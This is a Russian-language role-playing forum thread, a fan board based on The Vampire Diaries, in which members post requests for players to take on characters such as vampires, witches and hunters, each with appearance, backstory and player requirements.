TVD | CARPE NOCTEM

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » TVD | CARPE NOCTEM » advocatus diaboli » #0. game on. нужные персонажи

#0. game on. нужные персонажи

Сообщений 1 страница 30 из 30

1

ДРУЗЬЯ, ВРАГИ, РОДСТВЕННИКИ, ДЕТИ И ЛЮБОВЬ ПО ВЫГОДНЫМ ЦЕНАМ http://noid.su/fu/veryhappy.png 

http://media.tumblr.com/tumblr_lyoocgVl621r0q8ae.gif

Код:
[b]✤ внешность:[/b]
[b]✤ предполагаемые имя, фамилия:[/b]
[b]✤ принадлежность, возраст:[/b]
[b]✤ краткая справка:[/b]
[b]✤ дополнительно:[/b]

0

2

http://25.media.tumblr.com/tumblr_maacm8stNT1qackslo1_500.gif
✤ внешность: ackles, jensen & padalecki, jared
✤ предполагаемые имя, фамилия: Damien Barnham & Sam Barnham / Дэмиэн Барнэм & Сэм Барнэм
✤ принадлежность, возраст: люди; Дэмиэну - 28, Сэму - 25
✤ краткая справка:   
   > родились в Лоуренсе, штан Канзас, США;
   > совершенно разные по характерам. Дэмиэн - яркая и страстная натура, быстро увлекается и быстро остывает, знаменит своими любовными похождениями, крайне ветреный; Сэм - более спокойный и рассудительный, знает, чего хочет от жизни и никогда не болтает попусту;
   > братья воспитывались одним лишь отцом. В возрасте, когда Дэмиэну было восемь, а Сэму - пять, пропала без вести их мать. После этого отец Барнэмов вознамерился найти убийцу, но нашел не только его - оказалось, что мать семейства спуталась с вампиром, их закружила страсть и тот обратил ее, с тех пор они стали колесить по свету вместе;
   > в эту семейную тайну посвящен только Сэм. Отец посчитал старшего сына слишком безответственным, чтобы доверить ему такое, а младший Барнэм сам пытался найти ответ на вопрос, куда же все-таки подевалась мама. Таким образом тайна была раскрыта, и Сэм воспылал ненавистью к "кровососущим" (как он их сам называет). Он начал искать информацию о них и тренировать свои охотничьи навыки;
   > пару раз он даже натыкался на вампиров и, недолго думая, вбивал им кол глубоко в сердце;
   > спустя несколько лет, когда братья стали жить самостоятельной жизнью - Сэм учился на психолога и хвалился всем своей красивой невестой, Дэмиэн же пытался умерить свой пыл в плане беспорядочных связей и подрабатывал в местном баре, - в городе появилась некая Кэтрин Пирс, которая сразу же стала объектом желания всех мужчин. О ней, конечно, ходили громкие слухи, дошли они и до ушей братьев - но мимо Дэмиэна пройти не смогли. Тот заинтересовался... и попал в сети Катерины. Полюбил первый раз в своей жизни. Странно, но с Кэтрин случилось нечто аналогичное: она будто бы изменилась, стала лучше и прекратила все беспорядочные связи, но в том, что влюбилась, себе не признавалась - ведь именно этого она боялась, как огня;
   > Барнэм и Пирс были вместе уже несколько месяцев. Весь город знал их как официальную пару, Дэмиэн даже познакомил девушку с братом и его невестой. У них даже стали зарождаться дружеские отношения, и Кэтрин, вопреки своим принципам и временно возникающим сексуальным желаниям к Сэму, не переходила грань, проведенную дружбой;
   > естественно, Кэтрин пила Дэмиэна, более того - он знал, что она вампир, но торжественно обещал хранить тайну. Кстати, внушением вампирша пользовалась крайне редко, точнее, только один раз - тогда, когда решила вернуться в МФ ради Стефана. Она соскучилась по своему Сальваторе и внушила Барнэму не следовать за ней, а всем окружающим говорить, что его девушка уехала в длительную командировку;
   > во время отсутствия Кэтрин случилось непредвиденное: Сэм обнаружил на теле Дэмиэна укусы и быстро осознал, в чем дело. Он пытался вразумить брата, но в ответ получал лишь отказы. Тогда младший Барнэм решил достать с чердака припасенные колья и убить вампиршу по ее возвращению;
   > но планы сорвались. Когда Пирс вернулась, Дэмиэн сразу же сообщил ей, что Сэм, вероятно, догадался о ее сущности. Та сказала, что немедленно покидает город, Дэмиэн решает отправиться с ней. Пока паковались чемоданы, Кэтрин решила навестить Сэма и внушить тому забыть о ее существовании и существовании Дэмиэна, дабы тот не искал их и жил спокойной жизнью. Но Сэм был подготовлен - у него в руке была зажата вербена. Он решил прикинуться, что внял внушению, после чего решил отправиться за братом и вампиршей, желая убить обоих. Да, он сделал вывод, что его брат уже не является собой из-за множественных внушений, именно это и побудило его принять такое решение.
   > идя по следам Пирс и брата, он попадает в Мистик Фоллс. Естественно, ни о какой невесте уже и речи идти не может - какая там невеста, когда в жизни появилась новая цель! Первым человеком, кого встречает Сэм, становится Кэролайн Форбс - тот влюбляется и в упор не видит, что девушка является вампиром. Вскоре Форбс знакомит Сэма с Гилберт, но Барнэм быстро осознает, что Елена и Кэтрин - две совершенно разные личности. Отношения Сэма и Кэролайн становятся все лучше и лучше, приобретая романтический оттенок. Кажется, Сэм уже совсем забыл, с какой целью приехал в Мистик Фоллс;
   > но в один прекрасный день, пригласив Кэр на свидание, он сталкивается с Кэтрин и Дэмиэном буквально нос к носу. И это, несомненно, повлечет серьезные последствия.

✤ дополнительно:
у нас уже имеется продуманная линия развития изложенного выше сюжета. начать отыгрыш мы хотим непосредственно с момента приезда Сэма в МФ. в перспективе обоих братьев ожидает обращение.
хотелось бы видеть в данной роли опытных игроков с красивыми постами. кросспол - почему бы и нет, но только если у вас действительно это идеально выходит. активность, понимание персонажей, желание играть - больше нам с кэрушкой ничего не требуется. очень ждем любимых братьев :з

+3

3

http://s019.radikal.ru/i619/1204/14/53214965ee33.gif

ЗАНЯТА

Часто единственное, что нужно, чтобы найти новый путь — это сделать резкий поворот и посмотреть, что из этого получится. Но будь осторожен: иногда то, с чем ты сталкиваешься — это тупик.
✤ внешность: Emilie De Ravin, Эмили Де Рэйвин; впрочем, если вы готовы предложить мне не менее милую девушку, то я вполне могу обсудить с вами смену внешности.
✤ предполагаемые имя, фамилия: Anne-Marie, Blair, Chloe, Sophie, Anna, Elizabeth/фамилия на ваш выбор
✤ принадлежность, возраст: человек [вампир в будущем], 17-19 лет
✤ краткая справка:
Я разочарована. Разочарована в человечестве, в мире, который до сегодняшнего дня казался мне таким понятным и все же нетривиальным. Оказывается, чем больше ты веришь в то, что поняла истинный облик реальности, тем скорее она поспешит убедить тебя в обратном. Вероятно, мы все чувствуем себя особенными, центром вселенной, покорителями пространства. Но это лишь эгоцентричные догадки жалких представителей человеческой расы. Мы никто. Песчинки во всепоглощающей буре. Мы - расходный материал для чего-то большего, более величественного, чем мы сами. И по этой причине, впредь, я не желаю мириться со своей ничтожностью. И я знаю как это изменить.
- Девушка - прекрасный пример дочери, коей стоит гордиться. Прекрасные результаты в школе, многочисленные друзья и всеобщее обожание. Она привлекала людей своей живостью, отсутствием фальши и верностью. Ей присущи такие качества как прямолинейность, справедливость и любопытство. Крайне упорна и трудолюбива, ради осуществления цели готова на многое. Находясь подле данной особы крайне сложно не заразиться прекрасным расположением духа. Пожалуй, ее жизнь можно было счесть за идеальную, но вместе с открытием "нового" мира, к ней пришло разочарование в сказочности собственной судьбы.
- Пережила нападение вампира, спасенная неким Стефаном Сальваторе, который являлся ее полноправным одноклассником. Тот попытался стереть память девушке, но будучи дочерью одного из комитета основателей, она издавна принимала вербену без своего же ведома. С того момента пребывала в смятении, ведь ранее банальная вселенная превратилась в водоворот противостояний, где люди занимают разве что не низшую ступень.
- Намерена обратиться в вампира, хоть на данный момент и не имеет малейшего понятия как именно это сделать. Ко всему прочему, она не намерена оставаться в одиночестве, познавая новую "оболочку", и именно по сей причине видит в Стефане прекрасного учителя и того, кто мог бы подарить девушке вечность. Кажется, в ее сознании уже возник план как заставить вампира повиноваться ее желаниям.
✤ дополнительно: Естественным образом, я желаю видеть активного игрока, который не пропадет через пару дней, взяв роль, способного писать посты от 25-30 строк и более. У меня достаточно грандиозные планы на персонажа, что вы можете наблюдать в описании данной представительницы женского пола. Уверяю: скучать вы точно не будете, ведь я обеспечу вас постоянным партнером по игре в виде самого себя. Ко всему прочему могу обещать снабжать вас аватарами, если вы возьмете именно внешность Эмили.
На счет характера, прошу не вдаваться в крайность и не делать из девушки настоящее воплощение эгоизма и, тем более, вечно-светящий лучик солнца. В остальном у меня никаких пожеланий ;з

Отредактировано Stefan Salvatore (2012-04-29 03:29:57)

+1

4

http://25.media.tumblr.com/tumblr_m9z6coA2mO1rykes4o1_500.gif

✤ внешность: Adam Levine. выслушаю ваши варианты.
✤ предполагаемые имя, фамилия: хочу что-нибудь французское, но не слишком необычное. Как насчет имени Alexandre | Александр, Gaspard | Гаспар или Claude | Клод, к примеру? Фамилия мне очень импонирует Leroy | Леруа. Но играть вам, так что перекладываю этот выбор целиком и полностью на ваши плечи.
✤ принадлежность, возраст: таки вампир, возраст от 580 лет, на вид же не более 27
✤ краткая справка: Помнишь то лето войны Роз?
А я помню тебя, мой_милый_спаситель. У меня же тяга ко всему чужому, запретному, недоступному. К тому, чье прикосновение заставляет меня леденеть, а слова - пылать в кострах преисподней.
Ты удивительно похож на меня, и от этого становится горше вдвойне. Ты знаешь все мои слабые стороны, ты видишь меня насквозь, нет, ты управляешь мною, словно своей куколкой_вуду. Ты прекрасно понимаешь, как дразнишь меня, оставляя поцелуй со следами клыков на шее, а потом кидаешь к стене, и произносишь свое терпкое - Bonsoir, ma chere. А я-то не железная, мой_драгоценный_мальчик, не железная, даже если изо всех сил стараюсь такой казаться. Я кидаю в тебя первое попавшееся под руку - о, китайская ваза, твой подарок, - ну а ты, конечно же, без особых усилий ловишь ее и ставишь на стол: - C'est un cadeau, prendre soin d'elle. Ухмылка искажает твое прекрасное лицо.
Я сильная, на самом деле, и ты знаешь это. Но ты заставляешь меня быть маленькой_девочкой, отталкивая от себя, но заставляя вновь и вновь к тебе возвращаться.
Я знаю, какую месть приготовлю тебе, мой_сладкий. Твоя квартира слишком_в_порядке, не находишь? Сначала разобью окно, влезу, порву все твои подушки и развею перья вентилятором, раскидаю всю твою одежду по комнате и... Буду ждать. Буду ждать тебя, свернувшись на твоей же кровати, как провинившаяся школьница наказания. Ты придешь, усмехнешься, посмотришь на меня, такую жалкую и растрепанную, и взяв свежий номер газеты, который как ни странно не пострадал уйдешь на кухню, пить твой любимый кофе без сахара. Все, я ухожу, навсегда. В который раз навсегда, уже и не помню.
Ты придешь под вечер, когда я буду смотреть шоу Опры и есть ложками мороженое. Люди ведь верят, что оно избавляет от печали. Ты придешь, а я не посмотрю на тебе. А тебе все равно, ты улыбнешься и подсядешь ко мне, обняв за мои_уродливые_и_худые_плечи. - Raté, ma fille? Я поддамся соблазну, и буду поддаваться ему вновь и вновь. Ты_мой_наркотик.
Я ненавижу тебя. Я не могу без тебя.
смотрим клип Maroon 5 - Misery хд
✤ дополнительно: все просто:
;как видите, в пункте справки я расписала отношения, характер же оставляю на вас - ведь отыгрывать персонажа вам
;кросспол только при условии его идеального отыгрыша
;перед подачей анкеты свяжитесь, пожалуйста, со мной, дабы обговорить внешность, если Адам вас не устраивает
;посты-простыни меня пугают хд
;если вы заядлый флудерас - я вас уже люблю)
;я вас жду <3

Отредактировано Morgana Laskey (2012-09-08 13:28:42)

+1

5

ЗАНЯТА

http://25.media.tumblr.com/tumblr_m228nuM2OU1rsf5iuo1_500.gif

просьба ничего не менять!
✤ внешность: Lana del Rey
✤ предполагаемые имя, фамилия: настоящее имя: Шарлотта Казираги - Charlotte Kaziragi, в Мистик Фоллс известна под именем Шарлотта Линдберг - Charlotte Lindberg
✤ принадлежность, возраст: вампир, выглядит на 20, на самом деле ей 25
✤ краткая справка: Они повстречались в Монако семь лет назад. Николаса представили княжескому двору Монако как наследника Английского Графа Джерома Линдберга. Там он и повстречал прекрасную Шарлотту. Надо сказать, она - единственная, с кем ему хоть ненедолго удавалось забыть Мэри Фэрис. Два года они провели, скрывая свою тайную связь так, что никто о ней и не подозревал, кроме сестры Николаса, которая стала Шарлотте лучшей подругой.
Шарлотта была очарована Николасом, ему даже не пришлось пускать в ход внушение. Юное девичье сердце трепетало каждый раз, когда они оказывались в одной комнате. Родители Шарлотты решили выдать девушку замуж, когда ей было 20. После двух лет проведенных с Николасом ей не хотелось этого. Она решила инсценировать собственную смерть, чтобы иметь возможность сбежать. Надо ли говорить, что Николас помог ей.
С тех пор они путешествовали вместе. Страсть постепенно угасла, уступая место прекрасной дружбе и верному соратничеству. Шарлотта поклялась отомстить Катерине Петровой за то, что она причинила Николасу боль, а Мари Фэрис, за то, что она, сама того не ведая, не отпускает его сердце. Шарлотту уже так не тянет к Николасу. Но она его любит, скорее уже сестринской, нежели женской любовью.
Она последовала за Линдбергами и в Мистик Фоллс, говоря Николасу, что поможет ему вернуть Мэри, сама же, мечтая ее уничтожить. Шарлотта умеет плести интриги и настраивать людей на свой лад, или же против себя, как ей самой в тот момент будет выгодно. В городе она считается средней из отпрысков Линдбергов, тоесть старшей сестрой Сары и младшей сестрой Николаса.
Для Николаса она - память о тех временах, когда его сердце на какоей-то мгновение забилось не от любви к Мэри Фэрис, а от любви к Шарлотте Казираги. Но, не более. Не известно, избавится ли он от нее, если узнает, что именно она мешает их встрече с Мэри.
✤ дополнительно: ищу активного игрока, способного отыграть царственную особу (дочь принцессы Монако, внучку Грейс Келли), которая пошла на все только бы избежать нежелательного замужества и свободы от двора, хоть и модернизированного. Она не должна быть помешана на Николасе, но не должна ему прощать того, что он не может принадлежать ей.

Отредактировано Nicholas Lindberg (2012-05-13 15:39:10)

+2

6

http://media.tumblr.com/tumblr_m0t5nmWByq1r757jv.gif
thanx tumblr

ЗАНЯТ

✤ внешность: Matt Bomer
✤ предполагаемые имя, фамилия: по желанию
✤ принадлежность, возраст: vampire, ~800
✤ краткая справка:

Ты любишь дорогое вино и тяготеешь к сигарам больше, чем к сигаретам. Ты всегда одет с иголочки, немного на старый манер. Ты пьешь только человеческую кровь, но стараешься не оставлять жертв, не потому что тебе их жаль, а просто из-за нежелания возиться с трупами.

Ты прожил уже достаточно, чтобы твой эгоизм превысил максимум, ты сделал выводы за свою долгую жизнь и тебе уже нечего страшиться. Ты живешь для себя, впрочем, этот факт всегда оставался фактом на протяжении всех твоих прожитых лет. Ты явно считаешь себя хищником, расположившимся на верхней ступени пищевой цепочки, поэтому без зазрения совести способен убить, даже не имея на то причины. Хотя - "голоден" - звучит для тебя вполне убедительно.
Помнишь ли ты всю свою жизнь от и до? Вряд ли до мельчайших подробностей, на протяжении всего времени ты был слишком многими, чтобы всегда отмечать это в памяти. Ты безразличен практически ко всему, исключая дорогие вещи и стоящее вино. Ты эстет во всем, выбираешь для себя самое лучшее и никак иначе. Беспощаден и жесток с теми, кто стоит на твоем пути, ты не знаешь жалости, законченный циник. Но как бы все это не описывало тебя, мало кто знает о твоей внутренней романтичной натуре, которую не каждому дано рассмотреть. Для большинства это тайна за семью печатями.

— Иногда в твоих глазах я вижу отражение своего одиночества.
— Я думаю в этом мире все люди одинокие, все идут к какой-то цели. Иногда вместе.

Долгие скитания и твоя сущность привели лишь к тому, что ты познал одиночество и никчемность своего существования. Это был переломный момент в твоей жизни. Наверное именно тогда ты перестал до конца и полностью ощущать себя человеком, потому что все людские желания и потребности были тебе чужды. Ты не знал, чего хотел от жизни и хотел ли чего-то вообще. Твой разум и твоя душа полностью погрязли в одиночестве и раздумьях.
В этот переломный момент мне угораздило встретиться на твоем пути. И на тот момент было странным лишь то, что ты вообще меня заметил. Я была серой мышкой, незаметной, не выделяющейся, одинокой. Наверное именно это одиночество, отражающееся в моих глазах, привлекло тебя. По крайней мере, сейчас я могу уверять себя только в этом.
Ты подарил мне новую жизнь, не спрашивая хочу ли я этого, нуждаюсь ли, но, чёрт подери, это был самый лучший подарок в жизни, который поставил точку отсчета. Теперь меня ничто уж более не держало ни в родном городе, ни вообще где-то и с кем-то. Тогда всей моей жизнью был лишь ты, и я была полностью уверена, что не может быть никак иначе. Ты сделал меня такой, какой я являюсь сейчас, я - полностью твое творение со всеми своими изъянами, недостатками и достоинствами. Ты, как умелый мастер, выковал меня, исходя из своих предпочтений и желаний. Не эгоистично ли с твоей стороны? 
— Мне нужно было сделать выбор и я выбрала себя.
Мы много путешествовали, мы развлекались и жили только для себя. Мы никогда не экономили, лишь только растрачивая, крали, но никогда не попадались. И тогда, наверное, это была любовь, пока я не стала отдаляться от тебя, желая независимости, которая была под твоим запретом. Но я не зверушка на коротком поводке и я обыграла своего учителя.
Ты уже долгие годы следуешь по пятам за мной, но я всегда на шаг впереди. Мои передвижения не подчиняются никакой логике. Но сейчас ты знаешь больше - список моих слабостей и желаний увеличился. И ты уже дышишь мне в спину, не задумываясь о том, что движет тобой - чувства или желание мести, а я в свою очередь не оглядываюсь, потому что считаю, что прошлое никогда не настигнет...

✤ дополнительно:
Буду любить и лелеять, обеспечу игрой, по возможности графикой и вниманием, только найдись http://s2.rimg.info/85733d926bdef05f9a8a7cbccfb7dc14.gif

+1

7

http://savepic.su/1936382.gif
by rainbow hunt

✤ внешность: Alessandra Ambrosio or Isabeli Fontana
✤ предполагаемые имя, фамилия: имя не столь важно, фамилия Moreau
✤ принадлежность, возраст: ведьма, 24-26 y.o.
✤ краткая справка:

Ты восхитительна и неповторима, несмотря на свой трудный характер и тяжёлый нрав. Ты способна вцепиться в горло любому, кто перейдет тебе дорогу, при этом улыбка твоя будет только шире от превосходства над жертвой. Откуда столько жестокости и беспощадности? Так этого в тебе нет столько, но окружающие уверены в обратном, особенно те, что знакомы с тобой лично.
Ты выросла в приёмной семье и не сказать, что отношения с родителями сложились. О своей природе узнала случайно, но не была удивлена. Тебя вообще сложно удивить, особенно после всего того, что ты пережила. Твой серьезный взгляд, полный какой-то особой отчуждённости и в то же время раскрывающий всю глубину твоего ума, никогда не сменяется удивлённо вскинутыми бровями. Ты всегда походила на хищницу, способную не только постоять за себя, но и выдвинуться на охоту.
Мы познакомились около десяти лет назад, тогда ты помешала мне оставить очередной кровавый след в очередном городе. Для меня это было всего лишь развлечением, а для тебя шансом наконец-таки вырваться из родительского дома и пуститься по миру, имея в своем уме не только желание, но и значительное количество идей, а заодно подругу. Поначалу это было всего лишь сотрудничество. Мы помогаем друг другу во всем и каждая из нас знает, что без второй никак. Я обеспечиваю тебя защитой, ведь могу это себе позволить в силу своей сущности, ну а ты... ты ведьма, что играет мне на руку. Позже это сотрудничество переросло в дружбу, которая укрепилась и укоренилась за столько лет. Чтобы тебя не разыскивали, ты взяла мою фамилию и теперь на всех бумагах мы были сестрами. Это было придумано также для отвода чужих глаз, ведь что может быть подозрительного в том, что две сестры приезжают в новый город и пытаются обосноваться там? Никто ничего и не заподозрит, глядя на миловидных барышень. А переезжали мы часто, когда на одном и том же месте уже не было сил и возможностей оставаться.

✤ дополнительно:
очень жду и, надеюсь, найдется ответственный игрок, понимающий персонажа и готовый на разговор ^^

Отредактировано Nicolette Moreau (2012-08-09 19:28:00)

+1

8

НИКОЛАС ЛИНДБЕРГ И ШАРЛОТТА КАЗИРАГИ ИЩУТ СВОЙ КЛАН!

ПРАВАЯ РУКА И ПРОТЕЖЕ:
http://media.tumblr.com/tumblr_lymtozKuhP1r6cd5d.gif
✤ внешность: adam brody
✤ предполагаемые имя, фамилия: Joshua Hellbrook - Джошуа Хеллбрук
✤ принадлежность, возраст: вампир, выглядит на 23, всего ему 200 лет
✤ краткая справка: Родился в 1810 году в Великобритании, в городке Вудсток, что в графстве Оксфордшир на р. Глим, в семье военного. Его отец был очень строгим и временами жестоким человеком. В то время как остальные дети играли и развлекались, Джошуа проходил серьезный курс физической подготовки, отец был уверен, что сын тоже должен стать военным. Когда Джошуа было 12, его отец погиб от сердечного приступа. Джошуа отправили на обучение Итонский колледж, успешно окончив который, он с легкостью поступил в старейшее учебное заведение Великобритании – Оксфордский университет. На свое 23-летие получил от друзей «подарок» - обращение в вампира, как оказалось его сосед по общежитию и несколько его друзей были вампирами и подыскивали себе в клан новенького. Джошуа на эту роль подходил идеально: силен, хорошо подготовлен, умен и красив, вот только Джошуа такому подарку не обрадовался и от приглашения вступить в семью отказался, более того он устроил небольшой бунт и отправил на тот свет парочку вампиров. Поскитавшись по свету, а лет пять назад уехав в Америку, он встретил еще одну группу вампиров, но эта группа отличалась от прежней, это была семья, а не просто стайка вампиров, жаждущих власти. Так Джошуа и попал к Линдбергам. В городе его считают женихом Кассандры. Между ними действительно что-то есть, они даже получили "благословение" Линдберга-старшего, так как Джошуа является его лучшим другом и иногда - правой рукой.
✤ дополнительно: активность, понимание персонажа, легкость в общении, готовность много играть, кросс-пол разрешен

Отредактировано Nicholas Lindberg (2012-09-11 15:59:21)

0

9

дочь - занята;

http://media.tumblr.com/tumblr_lzpjmqt2oX1r5tdn1.gif

дочь - занята;

✤ внешность:-
✤ предполагаемые имя, фамилия: Eva-Lotta Chantal - Ева-Лотта Шанталь

✤ принадлежность, возраст: человек,  25
✤ краткая справка:

информация о второй героине

Ева-Лотта выросла прекрасной копией своей матери: рассудительной, красивой, умеющей себя подать, а главное - умной. Она пошла ее стопам на юридический, только-только его окончила и завела себе постоянного партнера, как пришло известие из Мистик Фоллс - скончалась мать Аманды, последний живой родственник в Мистике. Следовало принять наследство. Ева-Лотта сама вызвалась поехать вместе с матерью, похоронить бабушку и помочь ей в делах.

дочь - занята;

Ева-Лотта же в свое время знакомится с таинственной Шарлоттой Линдберг, которая поражена добротой и чистотой девушки, от чего мисс Линдберг решает взять ее под свою опеку и сделать из нее свое протеже. Аманда доверяет дочери и просит у нее помощи. Ева-Лотта же, по доброте душевной, делится всем этим с Шарлоттой. Линдберг не может допустить раскрытия тайны, отчего Ева-Лотта становится в ее руках марионеткой для спутывания планов Аманды. Позже, когда все совсем пойдет не так, Ева-Лотта будет обращена Шарлоттой в вампира (в игру Ева-Лотта входит человеком).

✤ дополнительно: активность, понимание персонажей, легкость в общении, готовность много играть

Отредактировано Nicholas Lindberg (2012-09-18 13:39:46)

0

10

временно не актуально

http://24.media.tumblr.com/tumblr_lro7pj8WW21r35r4io1_500.gif

✤ внешность: mario casas
✤ предполагаемые имя, фамилия: Hugo de la Torre / Хьюго де ла Торре *фамилия обсуждаема
✤ принадлежность, возраст: werewolf or human; 24-26 y.o.
✤ краткая справка:
наш с тобой основной план:
искусно сыграть в любовь.

Помнишь нашу первую встречу? Небольшой сквер в парке, дикий ливень, на скамье непонятного цвета - ты, только что расставшийся со своей девушкой, а я - перед тобой, с бледными губами и потекшей тушью. И черт знает почему я пришла именно туда, почему передо мной оказался ты, почему я так тихо и глупо молчала, вглядываясь в твое лицо, искаженное гримасой боли. Мне нужно было бежать от самой себя, от недавно открывшихся способностей, что я и делала - это объясняло причину моего нахождения под этим дождем, но сейчас я не могла сдвинуться с места, растворяясь в чужой, не_своей боли. Мне было плохо от чужого горя, но в это же время я ощущала себя прекрасно, забывая о странных открытиях в себе, которые пугали меня до мурашек.
   Кто бы знал, что эта скомканная встреча послужит началом нового знакомства. Мы проводили много, даже слишком много времени вместе, что настораживало, но отвлекало меня от собственных страхов. Наверное, где-то в глубине души я понимала, что ты стараешься утопить во мне боль от потери дорогого человека, но уверено не хотела это признавать. И я была рядом - среди ночи, среди дня, все это чертово время я проводила рядом с тобой. Или ты был рядом со мной. Мы просто были рядом. Вместе... Так тепло.
   Назвать наши отношения дружбой? Нет, это была уже далеко не дружба. Друзья не засыпают в обнимку под звездным небом, не играют в бутылочку вдвоем, не вычерчивают часами замысловатые узоры на обнаженной коже, пока один из них спит. Мы давно перешли грань, но не были любовниками, наполняя нашу жизнь красками и отдавая себя без остатка.

он всё кутался в дым табачный как в облака
а она на него смотрела как на святого

Время шло. Я наперед знала, что в нашей сказке не будет happy end'а, поэтому старалась не отпускать тебя от себя, наслаждаться каждым касанием, каждым вздохом, каждым взглядом таких горьких, но...любимых глаз. Я, наверное, потеряла голову, влюбилась, хотя запрещала себе чувствовать, не видя в любви хотя бы каплю положительного, а тут случилось такое. Ты относился ко мне как к подруге, очень хорошей подруге, будто мы были знакомы всю жизнь, все также обнимая перед сном. И даже представить не мог, как мне было парадоксально хорошо и плохо в подобные моменты. Резал мое сердце без ножа.
   Когда вернулась она, твоя бывшая девушка, я лишь нервно улыбалась и поздравляла тебя с ее возвращением, а ты, опьяненный счастьем, совсем не заметил, как из глаз моих хлынули слезы, стоило мне отвернуться к тебе спиной. Я снова оказалась в том сквере, снова был дождь, и лавочка непонятного цвета стояла на своем привычном месте; но изменилось лишь одно -  больше тут не было тебя. Кажется, я просидела на этом месте несколько часов, плакала, ранила себя воспоминаниями и не хотела возвращаться домой.
   После этого жизнь стала похожа на бред: я делала все машинально, стараясь не встречать вас двоих - красивых и безумно счастливых. Я запиралась в комнате, когда ты стучался в двери моего дома, сбрасывала телефонные звонки, а потом даже номер сменила - делала все, лишь бы забыть тебя и то, что было между нами. Или, вернее сказать, то, что было у меня к тебе.

привыкаю глазами смотреть вдаль, но порой так и глядят в пол.
ты разломал меня по частям. ты разломал меня от и до.

Я сходила с ума от собственной боли и  безысходности, но постепенно начинала жить. Жить без тебя. Не знала, что ты расстался со своей девушкой буквально через неделю, так как скучал по мне; не знала, что ты попал в аварию на своем мотоцикле и оказался в больнице, проведя там значительный срок. Ведь если бы знала, то не смогла бы удержать себя, не смогла бы перетерпеть, не смогла бы не оказаться рядом. Я, кажется, снова стала собой, только более ожесточенной и злой версией, пряча от окружающих осколки собственного сердца. Приняла свою открывшуюся сущность, приняла свои силы, стала наслаждаться жизнью сполна... А потом, потом решила уехать.
   И я даже представить не могла, что все это время ты пытался найти меня, ведь я думала, нет, я была уверена! - что ты счастлив. Даже уверила себя в том, что видела не твой силуэт и не твой мотоцикл на вокзале, что все это - игра воображения, иллюзии, появившиеся из-за страха покидать уже ставшее родным место. Но, собрав всю волю в кулак, я все-таки покинула тот город, ведь сны о Мистик Фоллс начали изрядно надоедать, к тому же там наверняка должна была оказаться разгадка того, откуда у меня появились эти необычные способности...
   Но, видимо, моя новая жизнь откладывается на неопределенный срок. Мы же встретимся здесь снова, right?

✤ дополнительно:
что касается расы - тут решайте сами, ибо, как мне показалось, ввести оборотня в сюжет было бы гораздо легче, к тому же его ген мог бы быть еще не активированным - так определенно будет интереснее.

- большие, красивые посты с мыслями и рассуждениями. да, я люблю так называемую "водичку", а не отписки в две-три строки, потому что сама пишу объемно (не простыни, конечно) и хотелось бы видеть достойного партнера;
- желание развивать своего персонажа, добавлять в него что-то свое, а не просто складывать все на мои плечи;
- желательно, чтобы вы смотрели фильм "три метра над уровнем неба" (да, такая вот я банальная), дабы понимали, каких эмоций я хочу от игры + хотелось бы увидеть персонажа, характером похожего на главного героя данного фильма. это не принципиально, но все-таки;
- активность в игре, было бы неплохо - во флуде;
- брать персонажа надолго! пожалуйста, проходите мимо, если понимаете, что не потянете/вас что-либо не устраивает/через два дня вы уезжаете в кругосветное путешествие и вернетесь совсем не скоро. мне действительно хотелось бы вести эту игру с одним человеком, вместе с которым мы доведем ее от начала до самого конца;
- на самом деле я добрая няшка) иногда сама задерживаю посты, ожидая вдохновения или по каким-либо другим причинам, поэтому не бойтесь - тиранить не буду;
- завалю аватарами, мувами и прочими плюшками, если нужда будет;
- кросспол не желателен, но я не против, так как девушки иногда замечательно отписываются за парней. только мне об этом не говорите первое время, чтобы я наслаждалась своим идеальным мужчиной хд.

обещаю обеспечить интересной игрой, поэтому очень жду. С:

Отредактировано Madeleine Stanhope (2012-09-06 20:35:41)

0

11

ЗАНЯТА

http://25.media.tumblr.com/tumblr_le3rjzBqJw1qbpdcto1_500.gif

✤ внешность:  Keira Knightley
✤ предполагаемые имя, фамилия: Clemence Rouge - Клеманс Руж
✤ принадлежность, возраст: ведьма; 22 года
✤ краткая справка:

Nicholas Lindberg написал(а):

Клеманс происходит из старинного рода французских ведьм, которые изначально были связаны с родом Линдбергов. Николас спас ее от возомнивших себя супергероями охотников на ведьм, когда ей было всего 15. Родителей ее он спасти не успел. Именно Клеманс изготовила кольцо для Шарлотты и обновила кольца Линдбергов. Она путешествует с Линдбергами вот уже семь лет.
Для пущей уверенности, Николас внушил ей верность, когда она спала (чтобы она не могла обороняться), так что он уверен, что Клеманс не предаст его (только если в голову ей не влезет кто-то посильнее его).
У Николаса и Клеманс друг к другу чисто естетический интерес - он восхищается ее красотой и постоянно рисует ее, Клеманс же, потерявшей семью - необходимо о ком-то заботиться. Хотя, однажды, Николас не удержался, а Клеманс не стала обороняться. Она так же, не смотря на то, что он старше ее на несколько столетий, иногда ведет себя как мать семейства, покупает цветы в дом, мебель, проверяет амулеты семьи и оберегает их. Шарлотта не любит Клеманс, однако даже она признает, что иногда ее забота вполне оправдана.

Из дневника Клеманс:

тут

Меня зовут Клеманс Руж. И я расскажу вам мою историю.
Я родилась в Париже, 22 года назад. В совершенно обыкновенной семье: отец – математик, мать – учительница пения. Моя жизнь была самой обыкновенной, разве только я всегда была слишком умной, слишком усердной и слишком старательной – это не сделало мне хорошей репутации в школе. Не знаю почему, я ведь не была страшилкой и не носила очков, но надо мной все издевались. Но жизнь есть жизнь, мы далеко не всегда выбираем те роли, которые нам нравятся. И вот -  я затаила злобу на весь мир.
Когда мне исполнилось 12, вместе с первым циклом я почувствовала внутри себя что-то другое, что-то новое. Будто бы во мне что-то жило. Я сразу же бросилась к матери, обсуждать такие дела с отцом я не хотела. И знаете что мне рассказала мама? Что я – потомственная ведьма. Я только рассмеялась и убежала в свою комнату делать уроки.
Правда через пару дней я пришла к ней в спальню, когда она сидела у туалетного столика и расчесывала свои прекрасные каштановые волосы, что спадали на плечи целым водопадом, и, сев на кровать, начала свои расспросы. Оказалось, что наш род берет начало ещё в пятом веке нашей эры. Я только удивленно ловила ртом воздух. А мама встала и открыла свой любимый сундук, что стоял у кровати, и показала мне Гримуар нашего семейства. Я была впечатлена. И утащила его в свою комнату, чтобы прочитать, когда мама готовила ужин. Хоть все следующие три года мама и посвятила моему обучению, мне всегда было мало.
Знаете, что я  первым делом сделала, разобравшись со своими силами хоть чуть-чуть? Я отомстила всем, кто меня гнобил все эти годы. Но не слишком сильно, лишь чуть подпортила их жизнь. Все же, не смотря ни на что, я вседа была доброй и отзывчивой девочкой.
